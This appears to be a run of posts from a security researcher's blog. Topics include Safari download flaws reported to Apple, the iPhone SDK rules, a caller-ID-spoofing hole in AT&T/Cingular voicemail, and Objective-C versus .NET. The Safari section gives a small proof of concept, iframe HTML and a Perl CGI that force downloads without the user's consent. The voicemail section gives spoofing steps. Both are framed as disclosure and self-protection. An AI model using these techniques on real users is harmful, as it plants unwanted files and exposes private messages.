Nitesh Dhanjani

I recently communicated 3 security issues in the Safari browser to Apple.

Apple let me know that they will fix 1 of the issues I reported. I will not discuss the vulnerability Apple has promised to fix until they release the fix because it is a high risk issue affecting Safari on OSX and Windows.

I let Apple know that I'd like to discuss the 2 issues they won't be fixing with the security community and they let me know they are fine with it. A quote from my last email to Apple:

...since you do not consider issue 1 and 2 to be security related, I will feel free to discuss my thoughts within the information security community. Just let me know if you would like me to wait for some amount of time before I do this.

Response from Apple: We understand if you want to discuss these in the security community.

Before I get to the details, I want to make it extremely clear that the Apple security team has been a pleasure to communicate with. I sent them a couple of emails asking for clarifications, and they responded quickly and courteously every time. I want to publicly acknowledge that I appreciate this very much.

Here are the issues I reported:

1. Safari Carpet Bomb. It is possible for a rogue website to litter the user's Desktop (Windows) or Downloads directory (~/Downloads/ in OSX). This can happen because the Safari browser cannot be configured to obtain the user's permission before it downloads a resource. Safari downloads the resource without the user's consent and places it in a default location (unless changed).

Assume you visit a malicious site, http://malicious.example.com/, that serves the following HTML:

<HTML>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
...
...
...
...
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
</HTML>

Now assume that http://malicious.example.com/cgi-bin/carpet_bomb.cgi is the following:

#!/usr/bin/perl
print "Content-type: blah/blah\n\n"


Since Safari does not know how to render content-type of blah/blah, it will automatically start downloading carpet_bomb.cgi every time it is served. If you are using Safari in Windows, this is what will happen to your desktop once you visit http://malicious.example.com/ :

The implication of this is obvious: Malware downloaded to the user's desktop without the user's consent.

Apple does not feel this is a issue they want to tackle at this time. In my most recent email to Apple, I suggested that they incorporate an option in Safari so the browser can be configured to ask the user before anything is downloaded to the local file system. Apple agreed it was a good suggestion:

...the ability to have a preference to "Ask me before downloading anything" is a good suggestion.  We can file that as an enhancement request for the Safari team.  Please note that we are not treating this as a security issue, but a further measure to raise the bar against unwanted downloads.  This will require a review with the Human Interface team.  We want to set your expectations that this could take quite a while, if it ever gets incorporated.

[credit to BK have-it-your-way Rios for suggesting the term "Carpet Bomb" to describe this issue].

2. Sandbox not Applied to Local Resources. This issue is more of a feature set request than a vulnerability. For example, Internet Explorer warns users when a local resource such as an HTML file attempts to invoke client side scripting. I feel this is an important security feature because of user expectations: even the most sophisticated users differentiate between the risk of clicking on an executable they have downloaded (risk perceived to be higher) to clicking on a HTML file they have downloaded (risk perceived to be lower).

Apple's response was positive:
...we have been investigating the potential for a "safe" mode for local HTML.  This is an area that requires a fairly deep investigation to address compatibility issues, and to determine the proper operation.  Please understand that when we label this as a security hardening measure, we are not discounting the benefits that this could have.

3. [Undisclosed]. The third issue I reported to Apple is a high risk vulnerability in Safari that can be used to remotely steal local files from the user's file system. Apple responded positively and let me know that they are actively working to resolve the issue and issue a patch. I will post an update if I hear back from them.

I'd like to thank the Apple security team for their timely responses and for letting me discuss these issues with the security community.

A quote from Steve Jobs during the iPhone SDK Press Conference last week:

If they write a malicious application we [will] track them down and tell their parents.

In other words, the iPhone applications will need to be digitally signed by Apple, and the developers will be required to register with Apple. It will be interesting to see what kind of information developers will be required to provide to Apple to register. Will they ask for the developer's credit card number? How will the developers authenticate their identity with Apple before they are allowed to submit their applications to be included in the store inventory?

Jobs also displayed the following slide to illustrate what types of applications will not be allowed on the iPhone:

Three points:

• Apple may have a difficult time auditing applications to ensure they meet their criteria. What is the absolute definition of malicious in the given context? Malicious to whom? The end user, Apple, or AT&T? Perhaps all of the above. Now, how does Apple go about obtaining assurance whether a given application is malicious or not? Will someone try out every application that is submitted? Will someone at Apple review the source code of every application to ensure it does not invoke any malicious operations and only calls published APIs?

• Applications may not run in the background. This is quite likely to be a decision based upon processing resource constraints. Note that Apple's own iPhone applications such as Mail, iPod, and SMS do run in the background.


• The Unforeseen clause means that Apple reserves the right to ban any application at any time. Will they be reasonable with the developers? I don't see why they wouldn't be as long as it doesn't hurt their bottom line, for example:

  11:32AM - We asked: Will SIM unlock software be considered software not allowed in the app store?

  A: Steve: (pause) "... yes." Laughter.

A video of the iPhone SDK presentation is available.

I just got myself an iPhone and I'm extremely pleased with it. I think it's the best cell phone on the market - a sheer pleasure to use.

The purpose of this post is to alert new iPhone customers about a security vulnerability in AT&T/Cingular's Voicemail system that has not been fixed for more than a year. I first wrote about this on February 1, 2006: Exploit Cingular Voicemail Vulnerability via Caller ID Spoofing. As soon as I got my new AT&T/Cingular number, I tested for this vulnerability and I can confirm that it still exists for new AT&T/Cingular accounts (atleast for iPhone customers). I can't force AT&T / Cingular to fix this issue, but I can tell you about it so you know what to do to protect yourself from this vulnerability.

Here is an explanation of the vulnerability in a nutshell: The AT&T/Cingular voicemail system is configured by default not to ask for a password when you check your voicemail from the handset (it asks for your voicemail password if you call your number from another cell phone and press * when your voicemail answers). Unfortunately, the AT&T/Cingular voicemail system trusts Caller ID to determine if the handset is calling it. Because Caller ID can be spoofed easily (see below), anyone can gain access into your voicemail by calling you and spoofing your phone number (it will appear as if you are calling yourself when your phone rings) - should you not answer the call, your voicemail will answer and allow the intruder full access to your messages.

Here is how to test the vulnerability:

1. Buy a calling card from Spoofcard. This service lets you spoof your caller ID.
2. Use another phone and call your cell phone using Spoofcard. When the Spoofcard asks you what number you want to spoof, enter your number again.
3. Do not pickup your cell phone. When the call goes into voicemail, if you are able to listen to your messages without being prompted for a password, then you are vulnerable.

Here is how to protect yourself from this vulnerability:

1. Call your AT&T/Cingular voicemail (dial your own number from the iPhone).
2. Press 4 to go to "Personal Options".
3. Press 2 to go to "Administrative Options".
4. Press 1 to go to "Password".
5. Press 2 to turn your password "ON".
6. Hang-up and call your voicemail again from your iPhone. If your voicemail system asks you for your voicemail password you are all set.

I sincerely hope that AT&T/Cingular gets around to fixing this huge security hole in their voicemail system.

Update: After giving some though to one of the responses on my O'Reilly blog, I have decided to take down the email thread between Jobs and myself. I have no way of knowing if Jobs would be OK with me posting the e-mail publicly, even though the contents of the e-mail didn't contain anything private or sensitive.

That said, I'd like to turn this entry into a discussion of what people think of having to use Objective C to code Cocoa applications. Feel free to comment on my O'Reilly blog. Here is my take on the subject: "Although I am a die-hard Apple and OSX fan, I've never cared for Objective-C much. As far as the development world is concerned, it is my opinion that Microsoft has done wonderful things with .NET, while Apple hasn't churned out much innovation (not recently at least.) I'd like to see Apple developers gain more choice. With every iteration of OSX, there seems to be so much effort put into innovation of desktop components, but the development environment is age old. I use Objective C because I have to, while I use recent languages such as C# and ruby because I want to. Take look at with Microsoft is doing with .NET: you can write your own .NET compiler - you just have to make sure it spits out the required IL code. It's beautiful and elegant, and you aren't locked onto one language. It's managed, and therefore a bit more expensive, but unless you are writing real time code, it doesn't matter today: it's not _that_ slow for writing most desktop applications. In short, I'd love to see Apple investigate managed code, and perhaps help bind Cocoa with more interesting and fun languages."

[Again, for comments, please visit my O'Reilly blog]
Update2 (12/27/2005): Thanks to those who commented below - most of the comments have been quite constructive and I've enjoyed reading them. I'd like to add the following notes to supplement my views:

1) I am not suggesting Apple carbon copy .NET and port it to the OSX as is. I am suggesting that Apple put in some resources to investigate the innovations and choices (C#, Python, etc can be used to spit out .NET assemblies. It is possible to write a compiler for .NET as long as they adhere to the IL specification - this is what I mean by more choice) offered by .NET and similarly offer it's developers more choice. I am suggesting that Apple take a _lead_ with offering its developers new paradigms of creating applications. Feel free to comment on your like or dislike for .NET and compare C# to Objective-C if you must, but you'd have lost the gist of my argument.

2) I do not agree that .NET is 'too slow' or only useful for developing quick and dirty solutions. I have come across a _lot_ of good enterprise level implementations of applications coded in .NET. Please don't attempt to convince me that .NET doesn't work for enterprise level applications - I have seen otherwise.

3) I do not agree with the "If its not broke, don't fix it" argument. This is an extremely dangerous argument. It limits progress and innovation. For example, Panther was a great iteration of OSX - why did Apple have to work towards Tiger? If one were to accept the "don't fix it" argument, Apple shouldn't have released Tiger, and Apple doesn't need to release any more iterations of OSX. Everything seems 'not broke' with Tiger today, why bother? The answer: innovation. There has got to be a non-stop iteration of improvements. Apple hasn't disappointed me with progress made towards OSX desktop components, and so I'd be happy to see a stronger push towards more choices and newer methods of development.

4) I do not agree with assertions along the lines of "Objective-C is the best. There is nothing better." Language preference is a matter of _taste_, and this cannot be forced upon anyone. _You_ may like the Objective-C way of doing things, but _I_ prefer newer languages such as ruby and C#. I am suggesting Apple investigate and put in efforts towards giving people more choice. There is no doubt in my mind that more developers will be enticed into developing for the OSX platform if they had more choice. Also see 7)

5) I am not suggesting Apple abandon Objective-C. Clearly, it has a tremendous fan following.

6) I am aware, and I appreciate many community related efforts towards bridging Cocoa with other languages. However, many of these are incomplete, and I'd be delighted if Apple chose to sponsor similar efforts.

7) As with .NET in 1), my example of ruby is just that - an example. I am not insisting that Apple only bind languages such as ruby and C# to Cocoa because I happen to like them. I am suggesting that Apple take a look at how these languages are improving the lives of developers. For all I care, Apple could come up with a brand new language after drawing inspiration from recent innovations of ruby and the like.

8) I am not suggesting that Apple has made no progress in the past few months. For example, I am aware of new solutions such as Core Data and Core Image to name a few.

To sum it up: Apple has blown me away with it's innovation with desktop components. For example, after having used Expose with hot-corners, I can't imagine life without it. I'd like Apple to channel some energy towards giving it's developers more choice of languages, and perhaps learn a thing or two from efforts such as the .NET environment and the ruby language.

Perhaps I should've posted the above with my original post, but I had no idea I was going to get Slashdotted. I've enjoyed most of the comments - but the amount of responses has been quite overwhelming. Much appreciated though!

Steve Jobs' speech to recent Standford graduates is now available in audio format (AAC and MP3). Also, here is the text version.